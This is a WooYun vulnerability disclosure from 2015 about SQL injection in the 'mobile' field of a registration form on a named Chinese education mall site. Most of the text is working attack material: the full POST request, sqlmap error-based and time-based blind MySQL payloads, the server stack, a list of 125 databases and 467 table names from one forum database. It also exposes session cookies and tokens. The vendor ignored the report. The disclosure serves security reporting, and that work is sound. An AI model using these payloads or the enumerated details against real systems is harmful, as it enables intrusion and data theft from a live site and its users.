当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139036

漏洞标题:好老师联盟某站存在SQL注入

相关厂商:hlslm.cn

漏洞作者: 路人甲

提交时间:2015-09-06 08:27

修复时间:2015-09-11 08:28

公开时间:2015-09-11 08:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://mall.jzq001.com/

POST /member.php?mod=zhuce HTTP/1.1
Content-Length: 1186
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_WNUJNQQGMX
Cookie: DVDd_1c73_saltkey=kGHcH4G4; DVDd_1c73_lastvisit=1441363214; DVDd_1c73_sid=ln2lZl; DVDd_1c73_lastact=1441366829%09plugin.php%09; DVDd_1c73_IS_CITYSITE=1; DVDd_1c73_cityname=%E5%85%A8%E5%9B%BD; DVDd_1c73_cityname_en=www; DVDd_1c73_con_request_token=2298710468495038928; DVDd_1c73_con_request_token_secret=IhqcQrusQAUXJHHq; DVDd_1c73_virtualid=99d2ccc88e5cdd4df5bf6962fd0fc661; DVDd_1c73_visitedfid=254D231D235; DVDd_1c73_viewid=tid_34745; DVDd_1c73_sendmail=1; DVDd_1c73_onlineusernum=90; DVDd_1c73_connect_not_sync_t=1; DVDd_1c73__refer=%252Fhome.php%253Fac%253Dshare%2526id%253D34745%2526mod%253Dspacecp%2526type%253Dthread; recom=1; DVDd_1c73_clientinfo=false; DVDd_1c73_download=201509041896; DVDd_1c73_goods=a%3A1%3A%7Bi%3A1896%3Ba%3A7%3A%7Bs%3A6%3A%22itemid%22%3Bs%3A4%3A%221896%22%3Bs%3A5%3A%22price%22%3Bs%3A2%3A%2235%22%3Bs%3A8%3A%22vipprice%22%3Bs%3A2%3A%2225%22%3Bs%3A9%3A%22pricetype%22%3Bs%3A1%3A%220%22%3Bs%3A7%3A%22viptype%22%3Bs%3A1%3A%221%22%3Bs%3A5%3A%22thumb%22%3Bs%3A51%3A%22source%2Fplugin%2Fmall%2Fpublic%2Fupload%2Fimg%2F1422407894.jpg%22%3Bs%3A5%3A%22title%22%3Bs%3A61%3A%22%E3%80%90%E8%8B%8F%E6%95%99%E7%89%9B%E6%B4%A5%E7%89%88%E3%80%91%E4%B8%89%E5%B9%B4%E7%BA%A7%E8%8B%B1%E8%AF%AD%E4%B8%8A%E5%86%8C%E6%9C%9F%E6%9C%AB%E8%AF%95%E9%A2%98%2814%E4%BB%BD%29%22%3B%7D%7D; DVDd_1c73_shoping=b%3A0%3B
Host: mall.jzq001.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1*
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--

mobile是注入点
125库:

2.jpg

漏洞证明:

sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [125]:
[*] 021gaokao.com
[*] 16qianjin_2013
[*] 16qianjin_2013_2
[*] 21edu
[*] 21edu1
[*] 21edu2
[*] 21eedu
[*] 51qiuxue
[*] 52eedu
[*] 52qiuxue
[*] backup
[*] bbs_52qiuxue
[*] bbs_52qiuxue20150805
[*] bbs_52qiuxue_20150703
[*] bbs_52qiuxue_20150804
[*] bbs_52qiuxue_backup20150703
[*] bfdly.com
[*] bfdly.com_new
[*] bfdly_com
[*] ceqiuxue
[*] dedecmsv57utf8sp1
[*] destoon
[*] efyingyu.com
[*] gt.52qiuxue.com
[*] hangjinxue
[*] hdm0360223_db
[*] htlx.iacliuxue.net_new
[*] huatong.cliuxue.net
[*] huatong.iacliuxue.org
[*] huatongbefoundfcom
[*] huatongbefoundfcombak
[*] huatongbefoundfcombbak
[*] ihuatong.com
[*] information_schema
[*] jh.ydyjiajiao.org
[*] jinghan.zhilife.net
[*] jinghantj.com
[*] jingrui
[*] jingrui1v1.com
[*] jr.ydyfudao.com
[*] jztjy.cn
[*] luntan
[*] luntantest1011
[*] maisiling
[*] moban_huatong
[*] my021gaokao
[*] my97today
[*] mybtxueda
[*] mycdxueda
[*] mycqxueda
[*] myczxueda
[*] mydg-seiko
[*] mydgxueda
[*] mydlxueda
[*] myfsxueda
[*] myhhhtxueda
[*] myhuizxueda
[*] mymupingwang
[*] myncxueda
[*] mynjlvying
[*] mynnxueda
[*] myshjingh
[*] mysql
[*] mysql_log
[*] mysuzxueda
[*] mytyxueda
[*] mywinnetcap
[*] mywzxueda
[*] myxmxueda
[*] myxuedacs
[*] myxyxueda
[*] myytxueda
[*] nice
[*] njlvying.com
[*] novel
[*] phpcms
[*] ppc
[*] ppcall.befound.cn
[*] qdxueda.cn
[*] qiaowai
[*] qwiacliuxuenet
[*] ruisiyingyu.com
[*] sq_sinobm
[*] sunmax
[*] sunmaxtest
[*] szjuzhitang.com
[*] ultrax
[*] vip.befound.cn
[*] vzmer00376
[*] www.1v1buxi.net
[*] www.1v1buxi.org/huatong
[*] www.1v1buxi.org/zhongqing
[*] www.aicansi.com
[*] www.aicansi.com/huatong
[*] www.bf1v1.org
[*] www.bfdeu.com/zhongqing
[*] www.bfdeu.com/zhongqing2
[*] www.bliuxue.net
[*] www.cpbo.cn/huatong
[*] www.k12-edu.org/zhongqing
[*] www.libro.cn/huatong
[*] www.mupingwang.com
[*] www.qzj999.com/zhongqing
[*] www.sdfyme.com/huatong
[*] www.tzun.cn/zhongqing
[*] www.ydy114.org/huatong
[*] www_51fudao_org_xxq
[*] wwwchuguoyiminnet_qw
[*] wwwcnadicn_qw
[*] wwwedubuxnet
[*] wwwedupeixcom
[*] wwwedupeixcombak
[*] wwwgexingfudaonetjinghan
[*] wwwivcdcn_qiaowai
[*] wwwpcfmcn_qiaowai
[*] wwwssjzhcom_qiaowai
[*] xajuzhitang.com
[*] yuejiliuxue.com
[*] yzm_usercenter
[*] zgjhjy.zhilife.net
[*] zhishenghuo.org
[*] zjht.befoundg.com
[*] zjht.befoundg.com.bak
[*] zqsa
[*] zt00p1_db

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: bbs_52qiuxue
[467 tables]
+----------------------------------+
| group |
| user |
| access |
| active_active_zh |
| active_changeusername |
| active_city_website_hooks |
| active_city_website_push_log |
| active_city_website_setting |
| active_lottery_chance_zh |
| active_lottery_line_zh |
| active_lottery_zh |
| active_questionnaire |
| active_questionnaire_users |
| active_share_qq_log |
| amy_user_setting |
| appbyme_config |
| appbyme_portal_module |
| appbyme_portal_module_source |
| appbyme_user_setting |
| article |
| baidusubmit_setting |
| baidusubmit_sitemap |
| baidusubmit_urlstat |
| class |
| common_admincp_cmenu |
| common_admincp_group |
| common_admincp_member |
| common_admincp_perm |
| common_admincp_session |
| common_admingroup |
| common_adminnote |
| common_advertisement |
| common_advertisement_custom |
| common_banned |
| common_block |
| common_block_favorite |
| common_block_item |
| common_block_item_data |
| common_block_permission |
| common_block_pic |
| common_block_style |
| common_block_xml |
| common_cache |
| common_card |
| common_card_log |
| common_card_type |
| common_connect_guest |
| common_credit_log |
| common_credit_log_field |
| common_credit_rule |
| common_credit_rule_log |
| common_credit_rule_log_field |
| common_cron |
| common_devicetoken |
| common_district |
| common_diy_data |
| common_domain |
| common_failedip |
| common_failedlogin |
| common_friendlink |
| common_grouppm |
| common_invite |
| common_magic |
| common_magiclog |
| common_mailcron |
| common_mailqueue |
| common_member |
| common_member_action_log |
| common_member_connect |
| common_member_count |
| common_member_crime |
| common_member_field_forum |
| common_member_field_home |
| common_member_forum_buylog |
| common_member_grouppm |
| common_member_log |
| common_member_magic |
| common_member_medal |
| common_member_newprompt |
| common_member_profile |
| common_member_profile_bak |
| common_member_profile_setting |
| common_member_security |
| common_member_secwhite |
| common_member_stat_field |
| common_member_status |
| common_member_validate |
| common_member_verify |
| common_member_verify_info |
| common_member_wechat |
| common_member_wechatmp |
| common_myapp |
| common_myinvite |
| common_mytask |
| common_nav |
| common_onlinetime |
| common_optimizer |
| common_patch |
| common_plugin |
| common_plugin_aliyunrec |
| common_plugin_luckypacket |
| common_plugin_luckypacketlog |
| common_pluginvar |
| common_process |
| common_regip |
| common_relatedlink |
| common_remote_port |
| common_report |
| common_searchindex |
| common_seccheck |
| common_secquestion |
| common_session |
| common_setting |
| common_setting2 |
| common_setting_150805 |
| common_setting_150807 |
| common_smiley |
| common_sphinxcounter |
| common_stat |
| common_statuser |
| common_style |
| common_stylevar |
| common_syscache |
| common_tag |
| common_tagitem |
| common_task |
| common_taskvar |
| common_template |
| common_template_block |
| common_template_permission |
| common_uin_black |
| common_usergroup |
| common_usergroup_field |
| common_verifycode |
| common_visit |
| common_word |
| common_word_type |
| connect_disktask |
| connect_feedlog |
| connect_memberbindlog |
| connect_postfeedlog |
| connect_tthreadlog |
| dsu_paulsign |
| dsu_paulsignemot |
| dsu_paulsignset |
| form |
| forum_access |
| forum_activity |
| forum_activityapply |
| forum_announcement |
| forum_attachment |
| forum_attachment_0 |
| forum_attachment_1 |
| forum_attachment_2 |
| forum_attachment_3 |
| forum_attachment_4 |
| forum_attachment_5 |
| forum_attachment_6 |
| forum_attachment_7 |
| forum_attachment_8 |
| forum_attachment_9 |
| forum_attachment_exif |
| forum_attachment_unused |
| forum_attachtype |
| forum_bbcode |
| forum_collection |
| forum_collectioncomment |
| forum_collectionfollow |
| forum_collectioninvite |
| forum_collectionrelated |
| forum_collectionteamworker |
| forum_collectionthread |
| forum_creditslog |
| forum_debate |
| forum_debatepost |
| forum_faq |
| forum_filter_post |
| forum_forum |
| forum_forum_threadtable |
| forum_forumfield |
| forum_forumrecommend |
| forum_groupcreditslog |
| forum_groupfield |
| forum_groupinvite |
| forum_grouplevel |
| forum_groupuser |
| forum_hotreply_member |
| forum_hotreply_number |
| forum_imagetype |
| forum_medal |
| forum_medallog |
| forum_memberrecommend |
| forum_moderator |
| forum_modwork |
| forum_newthread |
| forum_onlinelist |
| forum_order |
| forum_pinggu |
| forum_poll |
| forum_polloption |
| forum_polloption_image |
| forum_pollvoter |
| forum_post |
| forum_post_location |
| forum_post_moderate |
| forum_post_tableid |
| forum_postcache |
| forum_postcomment |
| forum_postlog |
| forum_poststick |
| forum_promotion |
| forum_ratelog |
| forum_relatedthread |
| forum_replycredit |
| forum_rsscache |
| forum_sofa |
| forum_spacecache |
| forum_statlog |
| forum_thread |
| forum_thread_moderate |
| forum_threadaddviews |
| forum_threadcalendar |
| forum_threadclass |
| forum_threadclosed |
| forum_threaddisablepos |
| forum_threadhidelog |
| forum_threadhot |
| forum_threadimage |
| forum_threadlog |
| forum_threadmod |
| forum_threadpartake |
| forum_threadpreview |
| forum_threadprofile |
| forum_threadprofile_group |
| forum_threadrush |
| forum_threadtype |
| forum_trade |
| forum_tradecomment |
| forum_tradelog |
| forum_typeoption |
| forum_typeoptionvar |
| forum_typevar |
| forum_warning |
| group_class |
| group_class_user |
| home_access |
| home_album |
| home_album_category |
| home_appcreditlog |
| home_blacklist |
| home_blog |
| home_blog_category |
| home_blog_moderate |
| home_blogfield |
| home_class |
| home_click |
| home_clickuser |
| home_comment |
| home_comment_moderate |
| home_docomment |
| home_doing |
| home_doing_moderate |
| home_favorite |
| home_feed |
| home_feed_app |
| home_follow |
| home_follow_feed |
| home_follow_feed_archiver |
| home_friend |
| home_friend_request |
| home_friendlog |
| home_notification |
| home_pic |
| home_pic_moderate |
| home_picfield |
| home_poke |
| home_pokearchive |
| home_share |
| home_share_moderate |
| home_show |
| home_specialuser |
| home_surrounding_user |
| home_userapp |
| home_userappfield |
| home_visitor |
| lev_login_auth_user |
| lev_open_auth_user |
| lev_open_login_user |
| log |
| mall_address |
| mall_advertsion |
| mall_advertsionswf |
| mall_down_15 |
| mall_down_data_15 |
| mall_favorite |
| mall_fields |
| mall_list |
| mall_order |
| mall_relation |
| mall_shopping |
| mall_withdata |
| mobile_setting |
| mobile_wechat_authcode |
| mobile_wechat_masssend |
| mobile_wechat_resource |
| mobile_wsq_threadlist |
| moodwall |
| myrepeats |
| node |
| node_operation |
| plugin_admincp_per |
| plugin_auction |
| plugin_auction_message |
| plugin_auction_xml |
| plugin_auctionapply |
| plugin_blessing |
| plugin_formmanage_formlist |
| portal_article_content |
| portal_article_count |
| portal_article_moderate |
| portal_article_related |
| portal_article_title |
| portal_article_trash |
| portal_attachment |
| portal_category |
| portal_category_permission |
| portal_comment |
| portal_comment_moderate |
| portal_rsscache |
| portal_topic |
| portal_topic_pic |
| resource_auth_group |
| resource_auth_group_user |
| role |
| role_user |
| role_user_copy |
| security_evilpost |
| security_eviluser |
| security_failedlog |
| sms_recv |
| sms_send |
| teacher_admin_log |
| teacher_area |
| teacher_artice |
| teacher_article |
| teacher_auditiondata |
| teacher_auditionlog |
| teacher_auth_base |
| teacher_auth_class |
| teacher_auth_courses |
| teacher_auth_experience |
| teacher_auth_index |
| teacher_auth_info |
| teacher_auth_log |
| teacher_auth_success_case |
| teacher_china |
| teacher_collect |
| teacher_comment |
| teacher_commission_log |
| teacher_consumption |
| teacher_course_1 |
| teacher_course_register |
| teacher_course_time_1 |
| teacher_course_type_1 |
| teacher_courses |
| teacher_courses_copy |
| teacher_customer_call_log |
| teacher_detail |
| teacher_experience |
| teacher_fund_log |
| teacher_main |
| teacher_member_bak |
| teacher_member_profile_bak |
| teacher_message_reminder |
| teacher_need |
| teacher_need_accept |
| teacher_need_copy |
| teacher_need_log |
| teacher_need_order_detaill |
| teacher_need_status |
| teacher_order |
| teacher_order_copy |
| teacher_parm |
| teacher_pay_log |
| teacher_points |
| teacher_proportion_rules |
| teacher_propotion_isopen |
| teacher_qrcode |
| teacher_qrcode_group |
| teacher_resources_manage |
| teacher_send_sms_log |
| teacher_sign |
| teacher_sign_log |
| teacher_student_base |
| teacher_student_class_feedback |
| teacher_student_contact |
| teacher_student_sign_feedback |
| teacher_success_case |
| teacher_teacher_base |
| teacher_teacher_comment |
| teacher_teacher_extend |
| teacher_teacher_inside_comment |
| teacher_tp_admin_log |
| teacher_tp_appointment |
| teacher_tp_appointment_copy |
| teacher_tp_area |
| teacher_tp_index |
| teacher_tp_pay_log |
| teacher_tp_type |
| teacher_tp_user_comments |
| teacher_tp_user_false_data |
| teacher_tp_user_false_parm |
| teacher_tp_user_feedback |
| teacher_umemberfields_bak |
| teacher_umembers_bak |
| teacher_user_comment |
| teacher_wechat_audition_send_log |
| teacher_wechat_send_log |
| teacher_wrong_log |
| teacher_wxvote |
| teacher_wxvote_people |
| teachers_teachers_extends |
| ucenter_admins |
| ucenter_amy_pm_heart |
| ucenter_applications |
| ucenter_badwords |
| ucenter_domains |
| ucenter_failedlogins |
| ucenter_feeds |
| ucenter_friends |
| ucenter_mailqueue |
| ucenter_memberfields |
| ucenter_members |
| ucenter_members_150813 |
| ucenter_members_copy |
| ucenter_members_copy1 |
| ucenter_mergemembers |
| ucenter_newpm |
| ucenter_notelist |
| ucenter_pm_indexes |
| ucenter_pm_lists |
| ucenter_pm_members |
| ucenter_pm_messages_0 |
| ucenter_pm_messages_1 |
| ucenter_pm_messages_2 |
| ucenter_pm_messages_3 |
| ucenter_pm_messages_4 |
| ucenter_pm_messages_5 |
| ucenter_pm_messages_6 |
| ucenter_pm_messages_7 |
| ucenter_pm_messages_8 |
| ucenter_pm_messages_9 |
| ucenter_protectedmembers |
| ucenter_settings |
| ucenter_sqlcache |
| ucenter_tags |
| ucenter_vars |
| wechat_log |
| weixin_binding |
| weixin_dy_back |
| weixin_dy_log |
| weixin_http_log |
| weixin_log |
| weixin_parm |
| weixin_push |
| weixin_qiye_log |
| will_log |
+----------------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-11 08:28

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无